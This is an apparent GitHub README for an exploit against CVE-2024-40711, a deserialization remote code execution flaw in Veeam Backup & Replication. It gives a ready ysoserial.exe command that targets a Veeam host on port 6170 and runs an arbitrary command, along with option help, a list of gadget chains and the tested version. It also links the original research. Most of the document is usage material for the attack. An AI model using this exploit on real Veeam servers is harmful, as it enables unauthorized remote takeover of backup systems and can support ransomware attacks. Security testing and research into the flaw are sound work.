realstatus / CVE-2024-40711-Exp

CVE-2024-40711-exp

Usage

.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"

Usage: ysoserial.exe [options]
Options:
      --vi, --targetveeamip=VALUE
                             The target Veeam Backup and reaplication IP
                               address
      --vp, --targetveeamport=VALUE
                             The target Veeam Backup and reaplication port
                               (default: 6170)
      --vc, --veeamexpcmd=VALUE
                             The target Veeam Backup and reaplication what
                               commands will be executed
      --vg, --veeamgadget=VALUE
                             The target Veeam Backup and reaplication what
                               gadget will be use (default: DataSet)


Other gadgets

Supported gadgets are: ActivitySurrogateDisableTypeCheck, ActivitySurrogateSelector, ActivitySurrogateSelectorFromFile, AxHostState, BaseActivationFactory, ClaimsIdentity, ClaimsPrincipal, DataSet, DataSetOldBehaviour, DataSetOldBehaviourFromFile, DataSetTypeSpoof, Generic, GenericPrincipal, GetterCompilerResults, GetterSecurityException, GetterSettingsPropertyValue, ObjectDataProvider, ObjRef, PSObject, ResourceSet, RolePrincipal, SessionSecurityToken, SessionViewStateHistoryItem, TextFormattingRunProperties, ToolboxItemContainer, TypeConfuseDelegate, TypeConfuseDelegateMono, Veeam, WindowsClaimsIdentity, WindowsIdentity, WindowsPrincipal, XamlAssemblyLoadFromFile, XamlImageInfo

However, the gadget you use must support SoapFormatter.

Test environment

Veeam Backup 12.1.1.56

Reference

watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)

Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)